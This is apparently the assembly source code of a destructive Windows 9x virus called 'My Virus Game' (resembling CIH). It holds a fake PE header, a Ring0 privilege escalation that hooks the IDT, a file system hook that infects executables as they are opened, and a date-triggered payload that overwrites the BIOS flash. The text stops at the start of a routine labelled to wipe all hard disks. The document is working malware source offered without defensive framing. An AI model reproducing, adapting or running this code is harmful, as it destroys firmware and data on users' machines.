- OriginalAppEXE SEGMENT
- FileHeader:
- db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
- db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
- db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
- db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
- db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
- db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
- db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
- db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
- db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
- db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
- db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
- db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
- db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
- db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
- db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
- db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
- db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
- db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
- db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
- db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
- db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
- db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
- dd 00000000h, VirusSize
- OriginalAppEXE ENDS
- ; ****************************************************************************
- ; * My Virus Game *
- ; ****************************************************************************
- ; *********************************************************
- ; * Constant Define *
- ; *********************************************************
- TRUE = 1
- FALSE = 0
- DEBUG = TRUE
- MajorVirusVersion = 1
- MinorVirusVersion = 4
- VirusVersion = MajorVirusVersion*10h+MinorVirusVersion
- IF DEBUG
- FirstKillHardDiskNumber = 81h
- HookExceptionNumber = 05h
- ELSE
- FirstKillHardDiskNumber = 80h
- HookExceptionNumber = 03h
- ENDIF
- FileNameBufferSize = 7fh
- ; *********************************************************
- ; *********************************************************
- VirusGame SEGMENT
- ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
- ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
- ; *********************************************************
- ; * Ring3 Virus Game Initial Program *
- ; *********************************************************
- MyVirusStart:
- push ebp
- ; *************************************
- ; * Let's Modify Structured Exception *
- ; * Handing, Prevent Exception Error *
- ; * Occurrence, Especially in NT. *
- ; *************************************
- lea eax, [esp-04h*2]
- xor ebx, ebx
- xchg eax, fs:[ebx]
- call @0
- @0:
- pop ebx
- lea ecx, StopToRunVirusCode-@0[ebx]
- push ecx
- push eax
- ; *************************************
- ; * Let's Modify *
- ; * IDT(Interrupt Descriptor Table) *
- ; * to Get Ring0 Privilege... *
- ; *************************************
- push eax ;
- sidt [esp-02h] ; Get IDT Base Address
- pop ebx ;
- add ebx, HookExceptionNumber*08h+04h ; ZF = 0
- cli
- mov ebp, [ebx] ; Get Exception Base
- mov bp, [ebx-04h] ; Entry Point
- lea esi, MyExceptionHook-@1[ecx]
- push esi
- mov [ebx-04h], si ;
- shr esi, 16 ; Modify Exception
- mov [ebx+02h], si ; Entry Point Address
- pop esi
- ; *************************************
- ; * Generate Exception to Get Ring0 *
- ; *************************************
- int HookExceptionNumber ; GenerateException
- ReturnAddressOfEndException = $
- ; *************************************
- ; * Merge All Virus Code Section *
- ; *************************************
- push esi
- mov esi, eax
- LoopOfMergeAllVirusCodeSection:
- mov ecx, [eax-04h]
- rep movsb
- sub eax, 08h
- mov esi, [eax]
- or esi, esi
- jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
- jmp LoopOfMergeAllVirusCodeSection
- QuitLoopOfMergeAllVirusCodeSection:
- pop esi
- ; *************************************
- ; * Generate Exception Again *
- ; *************************************
- int HookExceptionNumber ; GenerateException Again
- ; *************************************
- ; * Let's Restore *
- ; * Structured Exception Handing *
- ; *************************************
- ReadyRestoreSE:
- sti
- xor ebx, ebx
- jmp RestoreSE
- ; *************************************
- ; * When Exception Error Occurs, *
- ; * Our OS System should be in NT. *
- ; * So My Cute Virus will not *
- ; * Continue to Run, it Jmups to *
- ; * Original Application to Run. *
- ; *************************************
- StopToRunVirusCode:
- @1 = StopToRunVirusCode
- xor ebx, ebx
- mov eax, fs:[ebx]
- mov esp, [eax]
- RestoreSE:
- pop dword ptr fs:[ebx]
- pop eax
- ; *************************************
- ; * Return Original App to Execute *
- ; *************************************
- pop ebp
- push 00401000h ; Push Original
- OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
- ret ; Return to Original App Entry Point
- ; *********************************************************
- ; * Ring0 Virus Game Initial Program *
- ; *********************************************************
- MyExceptionHook:
- @2 = MyExceptionHook
- jz InstallMyFileSystemApiHook
- ; *************************************
- ; * Do My Virus Exist in System !? *
- ; *************************************
- mov ecx, dr0
- jecxz AllocateSystemMemoryPage
- add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
- ; *************************************
- ; * Return to Ring3 Initial Program *
- ; *************************************
- ExitRing0Init:
- mov [ebx-04h], bp ;
- shr ebp, 16 ; Restore Exception
- mov [ebx+02h], bp ;
- iretd
- ; *************************************
- ; * Allocate SystemMemory Page to Use *
- ; *************************************
- AllocateSystemMemoryPage:
- mov dr0, ebx ; Set the Mark of My Virus Exist in System
- push 00000000fh ;
- push ecx ;
- push 0ffffffffh ;
- push ecx ;
- push ecx ;
- push ecx ;
- push 000000001h ;
- push 000000002h ;
- int 20h ; VMMCALL _PageAllocate
- _PageAllocate = $ ;
- dd 00010053h ; Use EAX, ECX, EDX, and flags
- add esp, 08h*04h
- xchg edi, eax ; EDI = SystemMemory Start Address
- lea eax, MyVirusStart-@2[esi]
- iretd ; Return to Ring3 Initial Program
- ; *************************************
- ; * Install My File System Api Hook *
- ; *************************************
- InstallMyFileSystemApiHook:
- lea eax, FileSystemApiHook-@6[edi]
- push eax ;
- int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
- IFSMgr_InstallFileSystemApiHook = $ ;
- dd 00400067h ; Use EAX, ECX, EDX, and flags
- mov dr0, eax ; Save OldFileSystemApiHook Address
- pop eax ; EAX = FileSystemApiHook Address
- ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
- mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
- mov edx, [ecx]
- mov OldInstallFileSystemApiHook-@3[eax], edx
- ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
- lea eax, InstallFileSystemApiHook-@3[eax]
- mov [ecx], eax
- cli
- jmp ExitRing0Init
- ; *********************************************************
- ; * Code Size of Merge Virus Code Section *
- ; *********************************************************
- CodeSizeOfMergeVirusCodeSection = offset $
- ; *********************************************************
- ; * IFSMgr_InstallFileSystemApiHook *
- ; *********************************************************
- InstallFileSystemApiHook:
- push ebx
- call @4 ;
- @4: ;
- pop ebx ; mov ebx, offset FileSystemApiHook
- add ebx, FileSystemApiHook-@4 ;
- push ebx
- int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
- IFSMgr_RemoveFileSystemApiHook = $
- dd 00400068h ; Use EAX, ECX, EDX, and flags
- pop eax
- ; Call Original IFSMgr_InstallFileSystemApiHook
- ; to Link Client FileSystemApiHook
- push dword ptr [esp+8]
- call OldInstallFileSystemApiHook-@3[ebx]
- pop ecx
- push eax
- ; Call Original IFSMgr_InstallFileSystemApiHook
- ; to Link My FileSystemApiHook
- push ebx
- call OldInstallFileSystemApiHook-@3[ebx]
- pop ecx
- mov dr0, eax ; Adjust OldFileSystemApiHook Address
- pop eax
- pop ebx
- ret
- ; *********************************************************
- ; * Static Data *
- ; *********************************************************
- OldInstallFileSystemApiHook dd ?
- ; *********************************************************
- ; * IFSMgr_FileSystemHook *
- ; *********************************************************
- ; *************************************
- ; * IFSMgr_FileSystemHook Entry Point *
- ; *************************************
- FileSystemApiHook:
- @3 = FileSystemApiHook
- pushad
- call @5 ;
- @5: ;
- pop esi ; mov esi, offset VirusGameDataStartAddress
- add esi, VirusGameDataStartAddress-@5
- ; *************************************
- ; * Is OnBusy !? *
- ; *************************************
- test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
- jnz pIFSFunc ; goto pIFSFunc
- ; *************************************
- ; * Is OpenFile !? *
- ; *************************************
- ; if ( NotOpenFile )
- ; goto prevhook
- lea ebx, [esp+20h+04h+04h]
- cmp dword ptr [ebx], 00000024h
- jne prevhook
- ; *************************************
- ; * Enable OnBusy *
- ; *************************************
- inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
- ; *************************************
- ; * Get FilePath's DriveNumber, *
- ; * then Set the DriveName to *
- ; * FileNameBuffer. *
- ; *************************************
- ; * Ex. If DriveNumber is 03h, *
- ; * DriveName is 'C:'. *
- ; *************************************
- ; mov esi, offset FileNameBuffer
- add esi, FileNameBuffer-@6
- push esi
- mov al, [ebx+04h]
- cmp al, 0ffh
- je CallUniToBCSPath
- add al, 40h
- mov ah, ':'
- mov [esi], eax
- inc esi
- inc esi
- ; *************************************
- ; * UniToBCSPath *
- ; *************************************
- ; * This Service Converts *
- ; * a Canonicalized Unicode Pathname *
- ; * to a Normal Pathname in the *
- ; * Specified BCS Character Set. *
- ; *************************************
- CallUniToBCSPath:
- push 00000000h
- push FileNameBufferSize
- mov ebx, [ebx+10h]
- mov eax, [ebx+0ch]
- add eax, 04h
- push eax
- push esi
- int 20h ; VXDCall UniToBCSPath
- UniToBCSPath = $
- dd 00400041h
- add esp, 04h*04h
- ; *************************************
- ; * Is FileName '.EXE' !? *
- ; *************************************
- ; cmp [esi+eax-04h], '.EXE'
- cmp [esi+eax-04h], 'EXE.'
- pop esi
- jne DisableOnBusy
- IF DEBUG
- ; *************************************
- ; * Only for Debug *
- ; *************************************
- ; cmp [esi+eax-06h], 'FUCK'
- cmp [esi+eax-06h], 'KCUF'
- jne DisableOnBusy
- ENDIF
- ; *************************************
- ; * Is Open Existing File !? *
- ; *************************************
- ; if ( NotOpenExistingFile )
- ; goto DisableOnBusy
- cmp word ptr [ebx+18h], 01h
- jne DisableOnBusy
- ; *************************************
- ; * Get Attributes of the File *
- ; *************************************
- mov ax, 4300h
- int 20h ; VXDCall IFSMgr_Ring0_FileIO
- IFSMgr_Ring0_FileIO = $
- dd 00400032h
- jc DisableOnBusy
- push ecx
- ; *************************************
- ; * Get IFSMgr_Ring0_FileIO Address *
- ; *************************************
- mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
- mov edi, [edi]
- ; *************************************
- ; * Is Read-Only File !? *
- ; *************************************
- test cl, 01h
- jz OpenFile
- ; *************************************
- ; * Modify Read-Only File to Write *
- ; *************************************
- mov ax, 4301h
- xor ecx, ecx
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; *************************************
- ; * Open File *
- ; *************************************
- OpenFile:
- xor eax, eax
- mov ah, 0d5h
- xor ecx, ecx
- xor edx, edx
- inc edx
- mov ebx, edx
- inc ebx
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- xchg ebx, eax ; mov ebx, FileHandle
- ; *************************************
- ; * Need to Restore *
- ; * Attributes of the File !? *
- ; *************************************
- pop ecx
- pushf
- test cl, 01h
- jz IsOpenFileOK
- ; *************************************
- ; * Restore Attributes of the File *
- ; *************************************
- mov ax, 4301h
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; *************************************
- ; * Is Open File OK !? *
- ; *************************************
- IsOpenFileOK:
- popf
- jc DisableOnBusy
- ; *************************************
- ; * Open File Already Succeed. ^__^ *
- ; *************************************
- push esi ; Push FileNameBuffer Address to Stack
- pushf ; Now CF = 0, Push Flag to Stack
- add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
- ; ***************************
- ; * Get OffsetToNewHeader *
- ; ***************************
- xor eax, eax
- mov ah, 0d6h
- ; For Doing Minimal VirusCode's Length,
- ; I Save EAX to EBP.
- mov ebp, eax
- push 00000004h
- pop ecx
- push 0000003ch
- pop edx
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- mov edx, [esi]
- ; ***************************
- ; * Get 'PE\0' Signature *
- ; * of ImageFileHeader, and *
- ; * Infected Mark. *
- ; ***************************
- dec edx
- mov eax, ebp
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; ***************************
- ; * Is PE !? *
- ; ***************************
- ; * Is the File *
- ; * Already Infected !? *
- ; ***************************
- ; * WinZip Self-Extractor *
- ; * doesn't Have Infected *
- ; * Mark Because My Virus *
- ; * doesn't Infect it. *
- ; ***************************
- ; cmp [esi], '\0PE\0'
- cmp dword ptr [esi], 00455000h
- jne CloseFile
- ; *************************************
- ; * The File is ^o^ *
- ; * PE(Portable Executable) indeed. *
- ; *************************************
- ; * The File isn't also Infected. *
- ; *************************************
- ; *************************************
- ; * Start to Infect the File *
- ; *************************************
- ; * Registers Use Status Now : *
- ; * *
- ; * EAX = 04h *
- ; * EBX = File Handle *
- ; * ECX = 04h *
- ; * EDX = 'PE\0\0' Signature of *
- ; * ImageFileHeader Pointer's *
- ; * Former Byte. *
- ; * ESI = DataBuffer Address ==> @8 *
- ; * EDI = IFSMgr_Ring0_FileIO Address *
- ; * EBP = D600h ==> Read Data in File *
- ; *************************************
- ; * Stack Dump : *
- ; * *
- ; * ESP => ------------------------- *
- ; * | EFLAG(CF=0) | *
- ; * ------------------------- *
- ; * | FileNameBufferPointer | *
- ; * ------------------------- *
- ; * | EDI | *
- ; * ------------------------- *
- ; * | ESI | *
- ; * ------------------------- *
- ; * | EBP | *
- ; * ------------------------- *
- ; * | ESP | *
- ; * ------------------------- *
- ; * | EBX | *
- ; * ------------------------- *
- ; * | EDX | *
- ; * ------------------------- *
- ; * | ECX | *
- ; * ------------------------- *
- ; * | EAX | *
- ; * ------------------------- *
- ; * | Return Address | *
- ; * ------------------------- *
- ; *************************************
- push ebx ; Save File Handle
- push 00h ; Set VirusCodeSectionTableEndMark
- ; ***************************
- ; * Let's Set the *
- ; * Virus' Infected Mark *
- ; ***************************
- push 01h ; Size
- push edx ; Pointer of File
- push edi ; Address of Buffer
- ; ***************************
- ; * Save ESP Register *
- ; ***************************
- mov dr1, esp
- ; ***************************
- ; * Let's Set the *
- ; * NewAddressOfEntryPoint *
- ; * ( Only First Set Size ) *
- ; ***************************
- push eax ; Size
- ; ***************************
- ; * Let's Read *
- ; * Image Header in File *
- ; ***************************
- mov eax, ebp
- mov cl, SizeOfImageHeaderToRead
- add edx, 07h ; Move EDX to NumberOfSections
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; ***************************
- ; * Let's Set the *
- ; * NewAddressOfEntryPoint *
- ; * ( Set Pointer of File, *
- ; * Address of Buffer ) *
- ; ***************************
- lea eax, (AddressOfEntryPoint-@8)[edx]
- push eax ; Pointer of File
- lea eax, (NewAddressOfEntryPoint-@8)[esi]
- push eax ; Address of Buffer
- ; ***************************
- ; * Move EDX to the Start *
- ; * of SectionTable in File *
- ; ***************************
- movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
- lea edx, [eax+edx+12h]
- ; ***************************
- ; * Let's Get *
- ; * Total Size of Sections *
- ; ***************************
- mov al, SizeOfScetionTable
- ; I Assume NumberOfSections <= 0ffh
- mov cl, (NumberOfSections-@8)[esi]
- mul cl
- ; ***************************
- ; * Let's Set Section Table *
- ; ***************************
- ; Move ESI to the Start of SectionTable
- lea esi, (StartOfSectionTable-@8)[esi]
- push eax ; Size
- push edx ; Pointer of File
- push esi ; Address of Buffer
- ; ***************************
- ; * The Code Size of Merge *
- ; * Virus Code Section and *
- ; * Total Size of Virus *
- ; * Code Section Table Must *
- ; * be Small or Equal the *
- ; * Unused Space Size of *
- ; * Following Section Table *
- ; ***************************
- inc ecx
- push ecx ; Save NumberOfSections+1
- shl ecx, 03h
- push ecx ; Save TotalSizeOfVirusCodeSectionTable
- add ecx, eax
- add ecx, edx
- sub ecx, (SizeOfHeaders-@9)[esi]
- not ecx
- inc ecx
- ; Save My Virus First Section Code
- ; Size of Following Section Table...
- ; ( Not Include the Size of Virus Code Section Table )
- push ecx
- xchg ecx, eax ; ECX = Size of Section Table
- ; Save Original Address of Entry Point
- mov eax, (AddressOfEntryPoint-@9)[esi]
- add eax, (ImageBase-@9)[esi]
- mov (OriginalAddressOfEntryPoint-@9)[esi], eax
- cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
- jl OnlySetInfectedMark
- ; ***************************
- ; * Read All Section Tables *
- ; ***************************
- mov eax, ebp
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; ***************************
- ; * Full Modify the Bug : *
- ; * WinZip Self-Extractor *
- ; * Occurs Error... *
- ; ***************************
- ; * So When User Opens *
- ; * WinZip Self-Extractor, *
- ; * Virus Doesn't Infect it.*
- ; ***************************
- ; * First, Virus Gets the *
- ; * PointerToRawData in the *
- ; * Second Section Table, *
- ; * Reads the Section Data, *
- ; * and Tests the String of *
- ; * 'WinZip(R)'...... *
- ; ***************************
- xchg eax, ebp
- push 00000004h
- pop ecx
- push edx
- mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
- add edx, 12h
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; cmp [esi], 'nZip'
- cmp dword ptr [esi], 'piZn'
- je NotSetInfectedMark
- pop edx
- ; ***************************
- ; * Let's Set Total Virus *
- ; * Code Section Table *
- ; ***************************
- ; EBX = My Virus First Section Code
- ; Size of Following Section Table
- pop ebx
- pop edi ; EDI = TotalSizeOfVirusCodeSectionTable
- pop ecx ; ECX = NumberOfSections+1
- push edi ; Size
- add edx, ebp
- push edx ; Pointer of File
- add ebp, esi
- push ebp ; Address of Buffer
- ; ***************************
- ; * Set the First Virus *
- ; * Code Section Size in *
- ; * VirusCodeSectionTable *
- ; ***************************
- lea eax, [ebp+edi-04h]
- mov [eax], ebx
- ; ***************************
- ; * Let's Set My Virus *
- ; * First Section Code *
- ; ***************************
- push ebx ; Size
- add edx, edi
- push edx ; Pointer of File
- lea edi, (MyVirusStart-@9)[esi]
- push edi ; Address of Buffer
- ; ***************************
- ; * Let's Modify the *
- ; * AddressOfEntryPoint to *
- ; * My Virus Entry Point *
- ; ***************************
- mov (NewAddressOfEntryPoint-@9)[esi], edx
- ; ***************************
- ; * Setup Initial Data *
- ; ***************************
- lea edx, [esi-SizeOfScetionTable]
- mov ebp, offset VirusSize
- jmp StartToWriteCodeToSections
- ; ***************************
- ; * Write Code to Sections *
- ; ***************************
- LoopOfWriteCodeToSections:
- add edx, SizeOfScetionTable
- mov ebx, (SizeOfRawData-@9)[edx]
- sub ebx, (VirtualSize-@9)[edx]
- jbe EndOfWriteCodeToSections
- push ebx ; Size
- sub eax, 08h
- mov [eax], ebx
- mov ebx, (PointerToRawData-@9)[edx]
- add ebx, (VirtualSize-@9)[edx]
- push ebx ; Pointer of File
- push edi ; Address of Buffer
- mov ebx, (VirtualSize-@9)[edx]
- add ebx, (VirtualAddress-@9)[edx]
- add ebx, (ImageBase-@9)[esi]
- mov [eax+4], ebx
- mov ebx, [eax]
- add (VirtualSize-@9)[edx], ebx
- ; Section contains initialized data ==> 00000040h
- ; Section can be Read. ==> 40000000h
- or (Characteristics-@9)[edx], 40000040h
- StartToWriteCodeToSections:
- sub ebp, ebx
- jbe SetVirusCodeSectionTableEndMark
- add edi, ebx ; Move Address of Buffer
- EndOfWriteCodeToSections:
- loop LoopOfWriteCodeToSections
- ; ***************************
- ; * Only Set Infected Mark *
- ; ***************************
- OnlySetInfectedMark:
- mov esp, dr1
- jmp WriteVirusCodeToFile
- ; ***************************
- ; * Not Set Infected Mark *
- ; ***************************
- NotSetInfectedMark:
- add esp, 3ch
- jmp CloseFile
- ; ***************************
- ; * Set Virus Code *
- ; * Section Table End Mark *
- ; ***************************
- SetVirusCodeSectionTableEndMark:
- ; Adjust Size of Virus Section Code to Correct Value
- add [eax], ebp
- add [esp+08h], ebp
- ; Set End Mark
- xor ebx, ebx
- mov [eax-04h], ebx
- ; ***************************
- ; * When VirusGame Calls *
- ; * VxDCall, VMM Modifies *
- ; * the 'int 20h' and the *
- ; * 'Service Identifier' *
- ; * to 'Call [XXXXXXXX]'. *
- ; ***************************
- ; * Before Writing My Virus *
- ; * to File, I Must Restore *
- ; * them First. ^__^ *
- ; ***************************
- lea eax, (LastVxDCallAddress-2-@9)[esi]
- mov cl, VxDCallTableSize
- LoopOfRestoreVxDCallID:
- mov word ptr [eax], 20cdh
- mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
- mov [eax+2], edx
- movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
- sub eax, edx
- loop LoopOfRestoreVxDCallID
- ; ***************************
- ; * Let's Write *
- ; * Virus Code to the File *
- ; ***************************
- WriteVirusCodeToFile:
- mov eax, dr1
- mov ebx, [eax+10h]
- mov edi, [eax]
- LoopOfWriteVirusCodeToFile:
- pop ecx
- jecxz SetFileModificationMark
- mov esi, ecx
- mov eax, 0d601h
- pop edx
- pop ecx
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- jmp LoopOfWriteVirusCodeToFile
- ; ***************************
- ; * Let's Set CF = 1 ==> *
- ; * Need to Restore File *
- ; * Modification Time *
- ; ***************************
- SetFileModificationMark:
- pop ebx
- pop eax
- stc ; Enable CF(Carry Flag)
- pushf
- ; *************************************
- ; * Close File *
- ; *************************************
- CloseFile:
- xor eax, eax
- mov ah, 0d7h
- call edi ; VXDCall IFSMgr_Ring0_FileIO
- ; *************************************
- ; * Need to Restore File Modification *
- ; * Time !? *
- ; *************************************
- popf
- pop esi
- jnc IsKillComputer
- ; *************************************
- ; * Restore File Modification Time *
- ; *************************************
- mov ebx, edi
- mov ax, 4303h
- mov ecx, (FileModificationTime-@7)[esi]
- mov edi, (FileModificationTime+2-@7)[esi]
- call ebx ; VXDCall IFSMgr_Ring0_FileIO
- ; *************************************
- ; * Disable OnBusy *
- ; *************************************
- DisableOnBusy:
- dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy
- ; *************************************
- ; * Call Previous FileSystemApiHook *
- ; *************************************
- prevhook:
- popad
- mov eax, dr0 ;
- jmp [eax] ; Jump to prevhook
- ; *************************************
- ; * Call the Function that the IFS *
- ; * Manager Would Normally Call to *
- ; * Implement this Particular I/O *
- ; * Request. *
- ; *************************************
- pIFSFunc:
- mov ebx, esp
- push dword ptr [ebx+20h+04h+14h] ; Push pioreq
- call [ebx+20h+04h] ; Call pIFSFunc
- pop ecx ;
- mov [ebx+1ch], eax ; Modify EAX Value in Stack
- ; ***************************
- ; * After Calling pIFSFunc, *
- ; * Get Some Data from the *
- ; * Returned pioreq. *
- ; ***************************
- cmp dword ptr [ebx+20h+04h+04h], 00000024h
- jne QuitMyVirusFileSystemHook
- ; *****************
- ; * Get the File *
- ; * Modification *
- ; * Date and Time *
- ; * in DOS Format.*
- ; *****************
- mov eax, [ecx+28h]
- mov (FileModificationTime-@6)[esi], eax
- ; ***************************
- ; * Quit My Virus' *
- ; * IFSMgr_FileSystemHook *
- ; ***************************
- QuitMyVirusFileSystemHook:
- popad
- ret
- ; *************************************
- ; * Kill Computer !? ... *^_^* *
- ; *************************************
- IsKillComputer:
- ; Get Now Day from BIOS CMOS
- mov al, 07h
- out 70h, al
- in al, 71h
- xor al, 26h ; ??/26/????
- IF DEBUG
- jmp DisableOnBusy
- ELSE
- jnz DisableOnBusy
- ENDIF
- ; **************************************
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; * Kill Kill Kill Kill Kill Kill Kill *
- ; **************************************
- ; ***************************
- ; * Kill BIOS EEPROM *
- ; ***************************
- mov bp, 0cf8h
- lea esi, IOForEEPROM-@7[esi]
- ; ***********************
- ; * Show BIOS Page in *
- ; * 000E0000 - 000EFFFF *
- ; * ( 64 KB ) *
- ; ***********************
- mov edi, 8000384ch
- mov dx, 0cfeh
- cli
- call esi
- ; ***********************
- ; * Show BIOS Page in *
- ; * 000F0000 - 000FFFFF *
- ; * ( 64 KB ) *
- ; ***********************
- mov di, 0058h
- dec edx ; and al,0fh
- mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
- call esi
- ; ***********************
- ; * Show the BIOS Extra *
- ; * ROM Data in Memory *
- ; * 000E0000 - 000E01FF *
- ; * ( 512 Bytes ) *
- ; * , and the Section *
- ; * of Extra BIOS can *
- ; * be Writted... *
- ; ***********************
- lea ebx, EnableEEPROMToWrite-@10[esi]
- mov eax, 0e5555h
- mov ecx, 0e2aaah
- call ebx
- mov byte ptr [eax], 60h
- push ecx
- loop $
- ; ***********************
- ; * Kill the BIOS Extra *
- ; * ROM Data in Memory *
- ; * 000E0000 - 000E007F *
- ; * ( 80h Bytes ) *
- ; ***********************
- xor ah, ah
- mov [eax], al
- xchg ecx, eax
- loop $
- ; ***********************
- ; * Show and Enable the *
- ; * BIOS Main ROM Data *
- ; * 000E0000 - 000FFFFF *
- ; * ( 128 KB ) *
- ; * can be Writted... *
- ; ***********************
- mov eax, 0f5555h
- pop ecx
- mov ch, 0aah
- call ebx
- mov byte ptr [eax], 20h
- loop $
- ; ***********************
- ; * Kill the BIOS Main *
- ; * ROM Data in Memory *
- ; * 000FE000 - 000FE07F *
- ; * ( 80h Bytes ) *
- ; ***********************
- mov ah, 0e0h
- mov [eax], al
- ; ***********************
- ; * Hide BIOS Page in *
- ; * 000F0000 - 000FFFFF *
- ; * ( 64 KB ) *
- ; ***********************
- ; or al,10h
- mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
- call esi
- ; ***************************
- ; * Kill All HardDisk *
- ; ***************************************************
- ; * IOR Structure of IOS_SendCommand Needs *
- ; ***************************************************
- ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
- ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
